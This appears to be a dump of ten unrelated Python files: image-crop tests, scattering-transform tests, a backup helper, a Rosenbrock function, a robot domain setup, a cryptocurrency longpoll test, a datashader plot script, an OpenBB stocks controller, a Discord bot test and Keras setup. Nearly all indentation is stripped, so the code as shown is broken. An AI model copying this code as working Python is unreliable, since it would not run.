self.assertEqual(self.get_color_at(image, 0, 0), 'green')
self.assertEqual(self.get_color_at(image, 51, 0), 'red')
def test_small_crop_less_than_safe_area4(self):
def config_context(context):
context.request.width = 200
context.request.height = 300
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
# 300 x 450
self.assertCrop(fltr.context.request.crop, (150, 89, 450, 539))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (150, 89, 450, 539))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 200)
self.assertEqual(len(image), 300)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
self.assertEqual(self.get_color_at(image, 0, 78), 'red') # (450/640) * (200-89)
def test_linear_crop_1(self):
def config_context(context):
context.request.width = 400
context.request.height = 300
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (37, 103, 570, 503))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (37, 103, 570, 503))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 400)
self.assertEqual(len(image), 300)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
# (400/533) * (150 - 37), (400/533) * (200 - 103)
self.assertEqual(self.get_color_at(image, 85, 73), 'red')
def test_linear_crop_2(self):
def config_context(context):
context.request.width = 480
context.request.height = 480
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (55, 80, 535, 560))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (55, 80, 535, 560))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 480)
self.assertEqual(len(image), 480)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
# (480/480) * (150 - 55), (480/480) * (200 - 80)
self.assertEqual(self.get_color_at(image, 95, 120), 'red')
def test_linear_crop_3(self):
# Target height is larger than Crop MinHeight, so the full crop area is used.
def config_context(context):
context.request.width = 400
context.request.height = 400
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (55, 80, 535, 560))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (55, 80, 535, 560))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 400)
self.assertEqual(len(image), 400)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
# (400/480) * (150 - 55), (400/480) * (200 - 80)
self.assertEqual(self.get_color_at(image, 83, 100), 'red')
|
""" This script will test the submodules used by the scattering module"""
import torch
import unittest
import numpy as np
from scatharm.filters_bank import gaussian_3d, solid_harmonic_filters_bank
from scatharm.scattering import SolidHarmonicScattering
from scatharm import utils as sl
gpu_flags = [False]
if torch.cuda.is_available():
gpu_flags.append(True)
def linfnorm(x,y):
return torch.max(torch.abs(x-y))
class TestScattering(unittest.TestCase):
def testFFT3dCentralFreqBatch(self):
        # Check the zero-frequency component of the 3D FFT
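        # The zero-frequency (DC) component of the FFT equals the sum of all
        # samples, so the two quantities compared below must match.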
for gpu in gpu_flags:
x = torch.FloatTensor(1, 32, 32, 32, 2).fill_(0)
if gpu:
x = x.cuda()
a = x.sum()
y = sl.fft(x)
c = y[:,0,0,0].sum()
self.assertAlmostEqual(float(a), float(c), places=6)
def testSumOfGaussianFFT3d(self):
# Check the validity of Fourier transform of sum of gaussians
_N = 128
M, N, O = _N, _N, _N
sigma = 2.
n_gaussians = 10
np_grid = np.fft.ifftshift(
np.mgrid[-M//2:-M//2+M, -N//2:-N//2+N, -O//2:-O//2+O].astype('float32'), axes=(1,2,3))
np_fourier_grid = np_grid.copy()
np_fourier_grid[0] *= 2*np.pi / M
np_fourier_grid[1] *= 2*np.pi / N
np_fourier_grid[2] *= 2*np.pi / O
grid = torch.from_numpy(np_grid)
fourier_grid = torch.from_numpy(np_fourier_grid)
positions = torch.FloatTensor(1, n_gaussians, 3).uniform_(-0.5 * _N + 5*sigma, 0.5 * _N - 5*sigma)
positions[...,2].fill_(0)
weights = torch.FloatTensor(1, n_gaussians).uniform_(1, 10)
for gpu in gpu_flags:
if gpu:
_grid = grid.cuda()
_fourier_grid = fourier_grid.cuda()
_positions = positions.cuda()
_weights = weights.cuda()
else:
_grid = grid
_fourier_grid = fourier_grid
_positions = positions
_weights = weights
sum_of_gauss = sl.generate_weighted_sum_of_gaussians(
_grid, _positions, _weights, sigma, cuda=gpu)
sum_of_gauss_fourier = sl.generate_weighted_sum_of_gaussians_in_fourier_space(
_fourier_grid, _positions, _weights, sigma, cuda=gpu)
sum_of_gauss_ = sl.fft(sum_of_gauss_fourier, inverse=True)[..., 0]
difference = float(torch.norm(sum_of_gauss - sum_of_gauss_))
self.assertAlmostEqual(difference, 0., places=5)
def testSolidHarmonicFFT3d(self):
        # test that the inverse Fourier transform of the solid harmonic filters matches their spatial-domain formula
M, N, O = 192, 128, 96
sigma, L = 3., 1
j_values = [0]
solid_harmonics = solid_harmonic_filters_bank(M, N, O, j_values, L, sigma, fourier=False)
solid_harmonics_fourier = solid_harmonic_filters_bank(M, N, O, j_values, L, sigma, fourier=True)
for gpu in gpu_flags:
for l in range(L+1):
for m in range(2*l+1):
solid_harm = solid_harmonics[l][0:1,m]
solid_harm_fourier = solid_harmonics_fourier[l][0:1,m]
if gpu:
solid_harm = solid_harm.cuda()
solid_harm_fourier = solid_harm_fourier.cuda()
solid_harm_ = sl.fft(solid_harm_fourier, inverse=True)
difference = float(torch.norm(solid_harm - solid_harm_))
self.assertAlmostEqual(difference, 0, places=7)
def testSolidHarmonicScattering(self):
# Compare value to analytical formula in the case of a single Gaussian
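        # For a single unit-weight Gaussian of width sigma_gaussian, the first-order
        # solid harmonic coefficients reduce analytically to k**l with
        # k = sigma_wavelet / sqrt(sigma_wavelet**2 + sigma_gaussian**2), which is
        # exactly what the assertions at the end of this test verify.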
centers = torch.FloatTensor(1, 1, 3).fill_(0)
weights = torch.FloatTensor(1, 1).fill_(1)
sigma_gaussian = 3.
sigma_0_wavelet = 3.
M, N, O, j_values, L = 128, 128, 128, [0, 1], 4
grid = torch.from_numpy(
np.fft.ifftshift(np.mgrid[-M//2:-M//2+M, -N//2:-N//2+N, -O//2:-O//2+O].astype('float32'), axes=(1,2,3)))
x = sl.generate_weighted_sum_of_gaussians(grid, centers, weights, sigma_gaussian)
scat = SolidHarmonicScattering(M=M, N=N, O=O, j_values=j_values, L=L, sigma_0=sigma_0_wavelet)
args = {'integral_powers': [1]}
s_order_0, s_order_1 = scat(x, order_2=False, method='integral', method_args=args)
for i_j, j in enumerate(j_values):
sigma_wavelet = sigma_0_wavelet*2**j
k = sigma_wavelet / np.sqrt(sigma_wavelet**2 + sigma_gaussian**2)
for l in range(1, L+1):
self.assertAlmostEqual(float(s_order_1[0, 0, i_j, l]), k**l, places=4)
def testLowPassFilter(self):
# Test convolution of gaussian with a gaussian
centers = torch.FloatTensor(1, 1, 3).fill_(0)
weights = torch.FloatTensor(1, 1).fill_(1)
sigma_gaussian = 3.
sigma_0_wavelet = 3.
M, N, O, j_values, L = 128, 128, 128, [0, 1, 2], 0
grid = torch.from_numpy(
np.fft.ifftshift(np.mgrid[-M//2:-M//2+M, -N//2:-N//2+N, -O//2:-O//2+O].astype('float32'), axes=(1,2,3)))
x = torch.FloatTensor(1, M, N, O, 2).fill_(0)
x[..., 0] = sl.generate_weighted_sum_of_gaussians(grid, centers, weights, sigma_gaussian)
scat = SolidHarmonicScattering(M=M, N=N, O=O, j_values=j_values, L=L, sigma_0=sigma_0_wavelet)
for i_j, j in enumerate(j_values):
convolved_gaussian = scat._low_pass_filter(x, i_j)
sigma_convolved_gaussian = np.sqrt(sigma_gaussian**2 + (sigma_0_wavelet*2**j)**2)
true_convolved_gaussian = torch.FloatTensor(1, M, N, O, 2).fill_(0)
true_convolved_gaussian[0, ..., 0] = torch.from_numpy(gaussian_3d(M, N, O, sigma_convolved_gaussian, fourier=False))
diff = float(torch.norm(convolved_gaussian - true_convolved_gaussian))
self.assertAlmostEqual(diff, 0, places=5)
if __name__ == '__main__':
unittest.main()
|
"""
Prepare the destination folder for backup. Delete the pre-existing files there.
"""
import os
import shutil
def readyDst(dst):
if os.path.isfile(dst):
os.remove(dst)
print("%s File deleted" %(os.path.basename(dst)))
elif os.path.isdir(dst):
shutil.rmtree(dst)
print("%s Directory deleted" %dst)
|
import numpy as np
class Rosenbrock:
def __init__(self, n):
self.n = n
def function_eval(self, x):
assert x.shape[0] == self.n
a = x[1:, :] - x[:-1, :]**2
b = 1 - x[:-1, :]
out = np.sum(100 * a**2 + b**2, axis=0)
return out
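# Small sanity check (illustration only): the Rosenbrock function attains its
# global minimum of 0 at x = (1, ..., 1); function_eval expects an (n, m)
# array holding m column vectors.
if __name__ == '__main__':
    rb = Rosenbrock(n=4)
    print(rb.function_eval(np.ones((4, 1))))  # -> [0.]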
|
__author__ = 'patras'
from domain_springDoor import *
from timer import DURATION
from state import state
DURATION.TIME = {
'unlatch1': 5,
'unlatch2': 5,
'holdDoor': 2,
'passDoor': 3,
'releaseDoor': 2,
'closeDoors': 3,
'move': 10,
'take': 2,
'put': 2,
}
DURATION.COUNTER = {
'unlatch1': 5,
'unlatch2': 5,
'holdDoor': 2,
'passDoor': 3,
'releaseDoor': 2,
'closeDoors': 3,
'move': 10,
'take': 2,
'put': 2,
}
rv.LOCATIONS = [1, 2, 3]
rv.EDGES = {1: [2, 3], 2: [1], 3: [1]}
rv.DOORLOCATIONS = {(1, 3): 'd1', (1, 2): 'd2'}
rv.ROBOTS = ['r1', 'r2']
rv.DOORS = ['d1', 'd2']
rv.DOORTYPES = {'d1': 'ordinary', 'd2': 'ordinary'}
def ResetState():
state.load = {'r1': NIL, 'r2': NIL}
state.doorStatus = {'d1': 'closed', 'd2': 'closed'}
state.loc = {'r1': 2, 'r2': 1}
state.pos = {'o1': 3, 'o2': 3}
state.done = {0: False}
state.doorType = {'d1': UNK, 'd2': UNK}
tasks = {
1: [['moveTo', 'r2', 1]]
}
eventsEnv = {}
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bull Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test longpolling with getblocktemplate."""
from test_framework.test_framework import BullTestFramework
from test_framework.util import *
import threading
class LongpollThread(threading.Thread):
def __init__(self, node):
threading.Thread.__init__(self)
# query current longpollid
templat = node.getblocktemplate()
self.longpollid = templat['longpollid']
# create a new connection to the node, we can't use the same
# connection from two threads
self.node = get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
def run(self):
self.node.getblocktemplate({'longpollid':self.longpollid})
class GetBlockTemplateLPTest(BullTestFramework):
def set_test_params(self):
self.num_nodes = 2
def run_test(self):
self.log.info("Warning: this test will take about 70 seconds in the best case. Be patient.")
self.nodes[0].generate(10)
templat = self.nodes[0].getblocktemplate()
longpollid = templat['longpollid']
# longpollid should not change between successive invocations if nothing else happens
templat2 = self.nodes[0].getblocktemplate()
assert(templat2['longpollid'] == longpollid)
        # Test 1: test that the longpoll waits if we do nothing
thr = LongpollThread(self.nodes[0])
thr.start()
# check that thread still lives
thr.join(5) # wait 5 seconds or until thread exits
assert(thr.is_alive())
# Test 2: test that longpoll will terminate if another node generates a block
self.nodes[1].generate(1) # generate a block on another node
        # check that the thread will exit now that a new block was found
thr.join(5) # wait 5 seconds or until thread exits
assert(not thr.is_alive())
# Test 3: test that longpoll will terminate if we generate a block ourselves
thr = LongpollThread(self.nodes[0])
thr.start()
        self.nodes[0].generate(1)  # generate a block on our own node
thr.join(5) # wait 5 seconds or until thread exits
assert(not thr.is_alive())
# Test 4: test that introducing a new transaction into the mempool will terminate the longpoll
thr = LongpollThread(self.nodes[0])
thr.start()
# generate a random transaction and submit it
min_relay_fee = self.nodes[0].getnetworkinfo()["relayfee"]
# min_relay_fee is fee per 1000 bytes, which should be more than enough.
(txid, txhex, fee) = random_transaction(self.nodes, Decimal("1.1"), min_relay_fee, Decimal("0.001"), 20)
        # after the first minute the mempool is probed every 10 seconds, so within 80 seconds the longpoll should have returned
thr.join(60 + 20)
assert(not thr.is_alive())
if __name__ == '__main__':
GetBlockTemplateLPTest().main()
|
import argparse
import pandas as pd
import datashader as ds
import datashader.transfer_functions as tf
from datashader.utils import export_image
def create_plot(data, out, width):
"""Creates a figure of the ZVV transit network using ZVV's color scheme.
Args:
data: a csv file containing data usable for line plots
        out: the generated image is saved here
Returns:
None
"""
plot_data = pd.read_csv(data, low_memory=False)
x_range = (plot_data.shape_pt_lon.min(), plot_data.shape_pt_lon.max())
y_range = (plot_data.shape_pt_lat.min(), plot_data.shape_pt_lat.max())
height = int(round(width * (y_range[1] - y_range[0]) / (x_range[1] - x_range[0])))
cvs = ds.Canvas(
plot_width=width,
plot_height=height,
x_range=x_range,
y_range=y_range
)
layers = []
for color, data_part in plot_data.groupby('route_color'):
agg = cvs.line(
data_part, 'shape_pt_lon', 'shape_pt_lat',
agg=ds.sum('times_taken')
)
image_part = tf.shade(agg, cmap=['#000000', '#' + color], how='eq_hist')
layers.append(image_part)
image = tf.stack(*layers, how='add')
if out.endswith('.png'):
out = out[:-4]
export_image(image, filename=out, background='black')
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'-d', '--data',
help="A line-plot-compatible data file",
type=str,
required=True
)
parser.add_argument(
'-o', '--out',
help="The path of the output file",
type=str,
required=True
)
parser.add_argument(
'-w', '--width',
help="The width of the image in pixels",
type=int,
default=1600
)
args = parser.parse_args()
create_plot(args.data, args.out, args.width)
if __name__ == "__main__":
main()
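# Example invocation (hedged: the script and file names are hypothetical):
#   python create_plot.py --data shapes.csv --out network.png --width 1600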
|
"""Stock Context Controller"""
__docformat__ = "numpy"
import argparse
import logging
import os
from datetime import datetime, timedelta
from typing import List
import financedatabase
import yfinance as yf
from prompt_toolkit.completion import NestedCompleter
from openbb_terminal import feature_flags as obbff
from openbb_terminal.common import newsapi_view
from openbb_terminal.common.quantitative_analysis import qa_view
from openbb_terminal.decorators import log_start_end
from openbb_terminal.helper_funcs import (
EXPORT_ONLY_RAW_DATA_ALLOWED,
export_data,
valid_date,
)
from openbb_terminal.helper_classes import AllowArgsWithWhiteSpace
from openbb_terminal.helper_funcs import choice_check_after_action
from openbb_terminal.menu import session
from openbb_terminal.parent_classes import StockBaseController
from openbb_terminal.rich_config import console, translate, MenuText
from openbb_terminal.stocks import stocks_helper
# pylint: disable=R1710,import-outside-toplevel,R0913,R1702,no-member
logger = logging.getLogger(__name__)
class StocksController(StockBaseController):
"""Stocks Controller class"""
CHOICES_COMMANDS = [
"search",
"load",
"quote",
"candle",
"news",
"resources",
"codes",
]
CHOICES_MENUS = [
"ta",
"ba",
"qa",
"pred",
"disc",
"dps",
"scr",
"sia",
"ins",
"gov",
"res",
"fa",
"bt",
"dd",
"ca",
"options",
"th",
]
PATH = "/stocks/"
FILE_PATH = os.path.join(os.path.dirname(__file__), "README.md")
country = financedatabase.show_options("equities", "countries")
sector = financedatabase.show_options("equities", "sectors")
industry = financedatabase.show_options("equities", "industries")
def __init__(self, queue: List[str] = None):
"""Constructor"""
super().__init__(queue)
if session and obbff.USE_PROMPT_TOOLKIT:
choices: dict = {c: {} for c in self.controller_choices}
choices["search"]["--country"] = {c: None for c in self.country}
choices["search"]["-c"] = {c: None for c in self.country}
choices["search"]["--sector"] = {c: None for c in self.sector}
choices["search"]["-s"] = {c: None for c in self.sector}
choices["search"]["--industry"] = {c: None for c in self.industry}
choices["search"]["-i"] = {c: None for c in self.industry}
choices["search"]["--exchange"] = {
c: None for c in stocks_helper.market_coverage_suffix
}
choices["search"]["-e"] = {
c: None for c in stocks_helper.market_coverage_suffix
}
choices["support"] = self.SUPPORT_CHOICES
self.completer = NestedCompleter.from_nested_dict(choices)
def print_help(self):
"""Print help"""
stock_text = ""
if self.ticker:
s_intraday = (f"Intraday {self.interval}", "Daily")[
self.interval == "1440min"
]
if self.start:
stock_text = f"{s_intraday} {self.ticker} (from {self.start.strftime('%Y-%m-%d')})"
else:
stock_text = f"{s_intraday} {self.ticker}"
mt = MenuText("stocks/", 80)
mt.add_cmd("search")
mt.add_cmd("load")
mt.add_raw("\n")
mt.add_param("_ticker", stock_text)
mt.add_raw(self.add_info)
mt.add_raw("\n")
mt.add_cmd("quote", "", self.ticker)
mt.add_cmd("candle", "", self.ticker)
mt.add_cmd("news", "News API", self.ticker)
mt.add_cmd("codes", "Polygon", self.ticker)
mt.add_raw("\n")
mt.add_menu("th")
mt.add_menu("options")
mt.add_menu("disc")
mt.add_menu("sia")
mt.add_menu("dps")
mt.add_menu("scr")
mt.add_menu("ins")
mt.add_menu("gov")
mt.add_menu("ba")
mt.add_menu("ca")
mt.add_menu("fa", self.ticker)
mt.add_menu("res", self.ticker)
mt.add_menu("dd", self.ticker)
mt.add_menu("bt", self.ticker)
mt.add_menu("ta", self.ticker)
mt.add_menu("qa", self.ticker)
mt.add_menu("pred", self.ticker)
console.print(text=mt.menu_text, menu="Stocks")
def custom_reset(self):
"""Class specific component of reset command"""
if self.ticker:
return [
"stocks",
f"load {self.ticker}.{self.suffix}"
if self.suffix
else f"load {self.ticker}",
]
return []
@log_start_end(log=logger)
def call_search(self, other_args: List[str]):
"""Process search command"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="search",
description=translate("stocks/SEARCH"),
)
parser.add_argument(
"-q",
"--query",
action="store",
dest="query",
type=str.lower,
default="",
help=translate("stocks/SEARCH_query"),
)
parser.add_argument(
"-c",
"--country",
default="",
nargs=argparse.ONE_OR_MORE,
action=choice_check_after_action(AllowArgsWithWhiteSpace, self.country),
dest="country",
help=translate("stocks/SEARCH_country"),
)
parser.add_argument(
"-s",
"--sector",
default="",
nargs=argparse.ONE_OR_MORE,
action=choice_check_after_action(AllowArgsWithWhiteSpace, self.sector),
dest="sector",
help=translate("stocks/SEARCH_sector"),
)
parser.add_argument(
"-i",
"--industry",
default="",
nargs=argparse.ONE_OR_MORE,
action=choice_check_after_action(AllowArgsWithWhiteSpace, self.industry),
dest="industry",
help=translate("stocks/SEARCH_industry"),
)
parser.add_argument(
"-e",
"--exchange",
default="",
choices=list(stocks_helper.market_coverage_suffix.keys()),
dest="exchange_country",
help=translate("stocks/SEARCH_exchange"),
)
if other_args and "-" not in other_args[0][0]:
other_args.insert(0, "-q")
ns_parser = self.parse_known_args_and_warn(
parser,
other_args,
EXPORT_ONLY_RAW_DATA_ALLOWED,
limit=10,
)
if ns_parser:
stocks_helper.search(
query=ns_parser.query,
country=ns_parser.country,
sector=ns_parser.sector,
industry=ns_parser.industry,
exchange_country=ns_parser.exchange_country,
limit=ns_parser.limit,
export=ns_parser.export,
)
@log_start_end(log=logger)
def call_quote(self, other_args: List[str]):
"""Process quote command"""
ticker = self.ticker + "." + self.suffix if self.suffix else self.ticker
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="quote",
description=translate("stocks/QUOTE"),
)
if self.ticker:
parser.add_argument(
"-t",
"--ticker",
action="store",
dest="s_ticker",
default=ticker,
help=translate("stocks/QUOTE_ticker"),
)
else:
parser.add_argument(
"-t",
"--ticker",
action="store",
dest="s_ticker",
required="-h" not in other_args,
help=translate("stocks/QUOTE_ticker"),
)
# For the case where a user uses: 'quote BB'
if other_args and "-" not in other_args[0][0]:
other_args.insert(0, "-t")
ns_parser = self.parse_known_args_and_warn(parser, other_args)
if ns_parser:
stocks_helper.quote(ns_parser.s_ticker)
@log_start_end(log=logger)
def call_codes(self, _):
"""Process codes command"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="codes",
description="Show CIK, FIGI and SCI code from polygon for loaded ticker.",
)
ns_parser = self.parse_known_args_and_warn(parser, _)
if ns_parser:
if not self.ticker:
console.print("No ticker loaded. First use `load {ticker}`\n")
return
stocks_helper.show_codes_polygon(self.ticker)
@log_start_end(log=logger)
def call_candle(self, other_args: List[str]):
"""Process candle command"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="candle",
description=translate("stocks/CANDLE"),
)
parser.add_argument(
"-p",
"--plotly",
dest="plotly",
action="store_false",
default=True,
help=translate("stocks/CANDLE_plotly"),
)
parser.add_argument(
"--sort",
choices=[
"AdjClose",
"Open",
"Close",
"High",
"Low",
"Volume",
"Returns",
"LogRet",
],
default="",
type=str,
dest="sort",
help=translate("stocks/CANDLE_sort"),
)
parser.add_argument(
"-d",
"--descending",
action="store_false",
dest="descending",
default=True,
help=translate("stocks/CANDLE_descending"),
)
parser.add_argument(
"--raw",
action="store_true",
dest="raw",
default=False,
help=translate("stocks/CANDLE_raw"),
)
parser.add_argument(
"-t",
"--trend",
action="store_true",
default=False,
help=translate("stocks/CANDLE_trend"),
dest="trendlines",
)
parser.add_argument(
"--ma",
dest="mov_avg",
type=str,
help=translate("stocks/CANDLE_mov_avg"),
default=None,
)
ns_parser = self.parse_known_args_and_warn(
parser,
other_args,
EXPORT_ONLY_RAW_DATA_ALLOWED,
limit=20,
)
if ns_parser:
if self.ticker:
export_data(
ns_parser.export,
os.path.join(
os.path.dirname(os.path.abspath(__file__)), "raw_data"
),
f"{self.ticker}",
self.stock,
)
if ns_parser.raw:
qa_view.display_raw(
df=self.stock,
sort=ns_parser.sort,
des=ns_parser.descending,
num=ns_parser.limit,
)
else:
data = stocks_helper.process_candle(self.stock)
mov_avgs = []
if ns_parser.mov_avg:
                        mov_list = ns_parser.mov_avg.split(",")
for num in mov_list:
try:
mov_avgs.append(int(num))
except ValueError:
console.print(
f"{num} is not a valid moving average, must be integer"
)
stocks_helper.display_candle(
s_ticker=self.ticker,
df_stock=data,
use_matplotlib=ns_parser.plotly,
intraday=self.interval != "1440min",
add_trend=ns_parser.trendlines,
ma=mov_avgs,
)
else:
console.print("No ticker loaded. First use `load {ticker}`\n")
@log_start_end(log=logger)
def call_news(self, other_args: List[str]):
"""Process news command"""
if not self.ticker:
console.print("Use 'load <ticker>' prior to this command!", "\n")
return
parser = argparse.ArgumentParser(
add_help=False,
prog="news",
description=translate("stocks/NEWS"),
)
parser.add_argument(
"-d",
"--date",
action="store",
dest="n_start_date",
type=valid_date,
default=datetime.now() - timedelta(days=7),
help=translate("stocks/NEWS_date"),
)
parser.add_argument(
"-o",
"--oldest",
action="store_false",
dest="n_oldest",
default=True,
help=translate("stocks/NEWS_oldest"),
)
parser.add_argument(
"-s",
"--sources",
dest="sources",
default=[],
nargs="+",
help=translate("stocks/NEWS_sources"),
)
if other_args and "-" not in other_args[0][0]:
other_args.insert(0, "-l")
ns_parser = self.parse_known_args_and_warn(parser, other_args, limit=5)
if ns_parser:
sources = ns_parser.sources
for idx, source in enumerate(sources):
if source.find(".") == -1:
sources[idx] += ".com"
d_stock = yf.Ticker(self.ticker).info
newsapi_view.display_news(
term=d_stock["shortName"].replace(" ", "+")
if "shortName" in d_stock
else self.ticker,
num=ns_parser.limit,
s_from=ns_parser.n_start_date.strftime("%Y-%m-%d"),
show_newest=ns_parser.n_oldest,
sources=",".join(sources),
)
@log_start_end(log=logger)
def call_disc(self, _):
"""Process disc command"""
from openbb_terminal.stocks.discovery.disc_controller import (
DiscoveryController,
)
self.queue = self.load_class(DiscoveryController, self.queue)
@log_start_end(log=logger)
def call_dps(self, _):
"""Process dps command"""
from openbb_terminal.stocks.dark_pool_shorts.dps_controller import (
DarkPoolShortsController,
)
self.queue = self.load_class(
DarkPoolShortsController, self.ticker, self.start, self.stock, self.queue
)
@log_start_end(log=logger)
def call_scr(self, _):
"""Process scr command"""
from openbb_terminal.stocks.screener.screener_controller import (
ScreenerController,
)
self.queue = self.load_class(ScreenerController, self.queue)
@log_start_end(log=logger)
def call_sia(self, _):
"""Process ins command"""
from openbb_terminal.stocks.sector_industry_analysis.sia_controller import (
SectorIndustryAnalysisController,
)
self.queue = self.load_class(
SectorIndustryAnalysisController, self.ticker, self.queue
)
@log_start_end(log=logger)
def call_ins(self, _):
"""Process ins command"""
from openbb_terminal.stocks.insider.insider_controller import (
InsiderController,
)
self.queue = self.load_class(
InsiderController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
@log_start_end(log=logger)
def call_gov(self, _):
"""Process gov command"""
from openbb_terminal.stocks.government.gov_controller import GovController
self.queue = self.load_class(GovController, self.ticker, self.queue)
@log_start_end(log=logger)
def call_options(self, _):
"""Process options command"""
from openbb_terminal.stocks.options.options_controller import (
OptionsController,
)
self.queue = self.load_class(OptionsController, self.ticker, self.queue)
@log_start_end(log=logger)
def call_th(self, _):
"""Process th command"""
from openbb_terminal.stocks.tradinghours.tradinghours_controller import (
TradingHoursController,
)
self.queue = self.load_class(TradingHoursController, self.queue)
@log_start_end(log=logger)
def call_res(self, _):
"""Process res command"""
if self.ticker:
from openbb_terminal.stocks.research.res_controller import (
ResearchController,
)
self.queue = self.load_class(
ResearchController, self.ticker, self.start, self.interval, self.queue
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_dd(self, _):
"""Process dd command"""
if self.ticker:
from openbb_terminal.stocks.due_diligence import dd_controller
self.queue = self.load_class(
dd_controller.DueDiligenceController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_ca(self, _):
"""Process ca command"""
from openbb_terminal.stocks.comparison_analysis import ca_controller
self.queue = self.load_class(
ca_controller.ComparisonAnalysisController,
[self.ticker] if self.ticker else "",
self.queue,
)
@log_start_end(log=logger)
def call_fa(self, _):
"""Process fa command"""
if self.ticker:
from openbb_terminal.stocks.fundamental_analysis import fa_controller
self.queue = self.load_class(
fa_controller.FundamentalAnalysisController,
self.ticker,
self.start,
self.interval,
self.suffix,
self.queue,
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_bt(self, _):
"""Process bt command"""
if self.ticker:
from openbb_terminal.stocks.backtesting import bt_controller
self.queue = self.load_class(
bt_controller.BacktestingController, self.ticker, self.stock, self.queue
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_ta(self, _):
"""Process ta command"""
if self.ticker:
from openbb_terminal.stocks.technical_analysis import ta_controller
self.queue = self.load_class(
ta_controller.TechnicalAnalysisController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_ba(self, _):
"""Process ba command"""
from openbb_terminal.stocks.behavioural_analysis import ba_controller
self.queue = self.load_class(
ba_controller.BehaviouralAnalysisController,
self.ticker,
self.start,
self.queue,
)
@log_start_end(log=logger)
def call_qa(self, _):
"""Process qa command"""
if self.ticker:
from openbb_terminal.stocks.quantitative_analysis import (
qa_controller,
)
self.queue = self.load_class(
qa_controller.QaController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
# TODO: This menu should work regardless of data being daily or not!
# James: 5/27 I think it does now
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_pred(self, _):
"""Process pred command"""
if obbff.ENABLE_PREDICT:
if self.ticker:
if self.interval == "1440min":
try:
from openbb_terminal.stocks.prediction_techniques import (
pred_controller,
)
self.queue = self.load_class(
pred_controller.PredictionTechniquesController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
except ModuleNotFoundError as e:
logger.exception(
"One of the optional packages seems to be missing: %s",
str(e),
)
console.print(
"One of the optional packages seems to be missing: ",
e,
"\n",
)
# TODO: This menu should work regardless of data being daily or not!
else:
console.print("Load daily data to use this menu!", "\n")
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
else:
console.print(
"Predict is disabled. Check ENABLE_PREDICT flag on feature_flags.py",
"\n",
)
|
import sys
from pathlib import Path
import discord.ext.test as dpytest
import pytest
from discord.ext import commands
from dotenv import load_dotenv
def get_extensions():
extensions = []
extensions.append("jishaku")
if sys.platform == "win32" or sys.platform == "cygwin":
dirpath = "\\"
else:
dirpath = "/"
for file in Path("utils").glob("**/*.py"):
if "!" in file.name or "DEV" in file.name:
continue
extensions.append(str(file).replace(dirpath, ".").replace(".py", ""))
return extensions
load_dotenv()
@pytest.fixture
def bot(event_loop):
    bot = commands.Bot(command_prefix="!", loop=event_loop)  # command_prefix is a required argument of commands.Bot
bot.remove_command("help")
dpytest.configure(bot)
return bot
@pytest.mark.asyncio
async def test_cogs(bot):
for ext in get_extensions():
bot.load_extension(ext)
def pytest_sessionfinish():
print("Session finished")
|
import os
import logging
import numpy as np
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
import tensorflow as tf
os.environ['KERAS_BACKEND'] = 'tensorflow'
import keras
from packaging import version
assert version.parse(keras.__version__) >= version.parse("2.2.0"), \
"Keras version too old for the autoencoder, need at least 2.2.x"
from keras import backend as K
logger.info(f"Backend: {K.backend()}")
